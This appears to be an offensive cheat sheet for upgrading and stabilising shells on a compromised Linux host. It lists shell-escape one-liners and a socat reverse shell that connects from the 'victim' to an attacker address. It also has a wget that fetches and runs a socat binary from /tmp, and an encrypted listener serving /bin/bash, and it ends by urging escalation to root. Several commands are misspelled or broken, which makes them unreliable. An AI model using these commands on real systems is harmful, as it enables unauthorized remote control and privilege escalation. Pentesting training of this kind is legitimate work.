Upgrading TTY Shell

To check which shell is present in the system

cat /etc/shells

bash

/bin/bash -i

sh

/bin/sh -i

python

python -c 'import pty; pty.spwan("/bin/bash")'

Perl

perl -e 'exec "bin/bash";'

Ruby

ruby: exe "bin/bash"

Perl

perl: exec "bin/bash";

Lua

lua: os.execute('/bin/sh')

awk

awk 'BEGIN{system("/bin/sh")}'

Find

find / -name {name of file} -exec /bin/awk 'BEGIN{system("/bin/sh")}'

using Exec to launch the shell

find . -exec /bin/sh \; -quit

vim

``

vim -c ';!/bin/sh'

Vim Escape

vim
:set shell=/bin/sh
:shell

permission

ls -la <path/to/file or binary>

Stabilize Shell

Steps to Stabilize Your Shell

1. Upgrade to an Interactive Shell

python3 -c 'import pty;pty.spawn("/bin/bash")'

If python3 is unavailable, try:

python -c 'import pty;pty.spawn("/bin/bash")'

This gives you job control and allows using built-in commands like su.

1. Set Terminal Type

export TERM=xterm

This ensures compatibility with commands like clear and vim.

1. Background the Shell Press:

Ctrl + Z

This suspends the session and returns control to your local shell.

1. Modify Terminal Settings on Your Local Machine

stty raw -echo; fg

• stty raw -echo disables local echo and allows features like Tab autocompletion, arrow keys, and Ctrl + C.

• fg brings the background shell back to the foreground.

1. Adjust Terminal Size (Optional)

stty rows 38 columns 116

This ensures proper formatting for commands like vim or less. Bonus: Enable a Full TTY Shell If the above steps aren’t enough, try:

script /dev/null -c bash

or

reset

This may further improve terminal capabilities.

Reverse Shell Commands & Upgrade Techniques

---

Shell Upgrading Techniques

🐍 Python pty Module

• Upgrade to a pseudo-terminal.

• Command:

  python -c 'import pty; pty.spawn("/bin/bash")'

• Pros: Supports commands like su.

• Cons: Lacks full TTY features (no tab-completion).

🔁 Socat

• Enables fully interactive shells.

Kali Listener:

socat file:`tty`,raw,echo=0 tcp-listen:4444

Victim Execution:

socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.3.4:4444

If Socat is Missing on Target:

wget -q https://github.com/andrew-d/static-binaries/raw/master/binaries/linux/x86_64/socat -O /tmp/socat
chmod +x /tmp/socat
/tmp/socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.3.4:4444

• Pros: Full-featured TTY.

• Cons: Requires upload if not pre-installed.

🛠 Netcat TTY Fix with stty

1. On reverse shell:

   python -c 'import pty; pty.spawn("/bin/bash")'

2. Press Ctrl+Z to background the shell.

3. In attacker terminal:

   stty raw -echo
   fg

4. In shell:

   reset
   export SHELL=bash
   export TERM=xterm-256color
   stty rows <rows> columns <cols>

• Pros: Works well for quick upgrades.

• Cons: Can be error-prone.

---

3. Additional Considerations

🔄 Shell Stability

• High latency or poor connections can kill sessions.

• Use tmux or screen on target if available.

🧠 Target Environment Awareness

• Check for available shells (sh, bash, zsh).

• Investigate available tools.

🌐 Encoding Fixes

• To prevent character display issues:

  export LC_ALL=C

⬆️ Privilege Escalation

• Once shell is stable, start local enumeration and escalate to root.

🧩 Bonus Tools

• rlwrap: Enhances shells with readline (history, arrow keys).

• script /dev/null: Logs session.

🚨 Error Handling & Backup

• Have alternate methods ready if one fails.

🔐 Secure Your Reverse Shells

• Prefer encrypted connections when possible:

  socat OPENSSL-LISTEN:443,cert=mycert.pem,key=mykey.pem,fork EXEC:/bin/bash